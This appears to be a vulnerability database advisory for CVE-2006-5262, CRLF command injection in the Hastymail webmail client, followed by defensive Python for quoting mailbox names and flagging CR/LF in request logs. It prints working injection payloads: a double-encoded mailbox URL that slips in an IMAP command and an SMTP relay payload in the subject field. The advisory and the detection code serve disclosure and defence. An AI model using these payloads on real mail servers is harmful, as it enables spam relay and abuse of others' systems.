Hastymail IMAP/SMTP Remote Command Injection Vulnerability

Vulnerability ID: 1111227
Vulnerability type: Input validation
Published: 2006-10-10
Updated: 2006-10-16
CVE: CVE-2006-5262
CNNVD ID: CNNVD-200610-195
Platform: PHP
CVSS score: 6.5
|Vulnerability sources
https://www.exploit-db.com/exploits/28777
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-195
|Vulnerability details
Hastymail is a fast, secure, RFC-compliant, cross-platform IMAP/SMTP client application written in PHP. Hastymail has an input validation vulnerability in its handling of user requests; a remote attacker could exploit it to execute arbitrary commands on the server. A user holding a valid Hastymail account can send commands directly to the IMAP or SMTP server by embedding an "end of command" sequence (CRLF) in a Hastymail variable. A remote attacker can thereby bypass security restrictions and attack the IMAP or SMTP service.
|Exploit
source: http://www.securityfocus.com/bid/20424/info

Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An authenticated malicious user could execute arbitrary IMAP / SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system.

Hastymail 1.5 and prior versions are affected.

This example sends the CREATE IMAP command to the vulnerable parameter:
http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad

The SMTP POST relay example from a nonexistent email address is available:

POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1

to include:

Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
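The defect in both cases is that a user-controlled value (the mailbox name, the subject) is spliced into a protocol command without rejecting or encoding the CRLF that terminates an IMAP or SMTP command. The following is an added example, not Hastymail's code or its vendor fix: it shows how a webmail client should encode a mailbox name as an RFC 3501 quoted string (refusing control characters), and a detection helper that URL-decodes request parameters twice (the advisory's URL double-encodes the quote as %2522) and flags embedded CR/LF. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote, urlparse

# RFC 3501: a quoted string may not contain CR, LF or NUL; '\' and '"' are escaped.
CTL_RE = re.compile(r"[\x00-\x1f\x7f]")


class InvalidMailboxName(ValueError):
    pass


def imap_quote_mailbox(name: str) -> str:
    """Encode a user-supplied mailbox name as an IMAP quoted string.
    Any control character (including CR/LF) is rejected, so the value can
    never terminate the current command and start a second one."""
    if CTL_RE.search(name):
        raise InvalidMailboxName("control character in mailbox name")
    return '"' + name.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_select(tag: str, mailbox: str) -> str:
    """Build a complete, single IMAP SELECT command line."""
    return f"{tag} SELECT {imap_quote_mailbox(mailbox)}\r\n"


def looks_like_command_injection(query_value: str) -> bool:
    """Detection side: decode twice to unwrap %25xx double encoding, then
    flag a CR or LF, which has no legitimate place in a mailbox parameter."""
    decoded = unquote(unquote(query_value))
    return "\r" in decoded or "\n" in decoded


def flag_requests(log_lines):
    """Return the access-log lines whose query string carries CR/LF."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        for pair in urlparse(m.group(1)).query.split("&"):
            _, _, value = pair.partition("=")
            if looks_like_command_injection(value):
                flagged.append(line)
                break
    return flagged


# Constructed sample log lines (hypothetical hosts and paths), not from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /hastymail/html/mailbox.php?id=abc&mailbox=INBOX HTTP/1.1" 200',
    '10.0.0.9 - - "GET /hastymail/html/mailbox.php?id=abc&mailbox=INBOX%2522%0d%0aA0003%20X HTTP/1.1" 200',
]
```

The same quoting rule applies on the SMTP side: header values taken from the compose form must be rejected or folded if they contain a bare CR or LF, otherwise the client hands the server a second command.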
|References

Source: BID
Name: 20424
Link: http://www.securityfocus.com/bid/20424
Source: VUPEN
Name: ADV-2006-3956
Link: http://www.frsirt.com/english/advisories/2006/3956
Source: SECUNIA
Name: 22308
Link: http://secunia.com/advisories/22308
Source: hastymail.sourceforge.net
Link: http://hastymail.sourceforge.net/security.php
Source: XF
Name: hastymail-imap-command-execution(29407)
Link: http://xforce.iss.net/xforce/xfdb/29407
Source: BUGTRAQ
Name: 20061202 [ISecAuditors Security Advisories] IMAP/SMTP Injection in Hastymail
Link: http://www.securityfocus.com/archive/1/archive/1/453417/100/0/threaded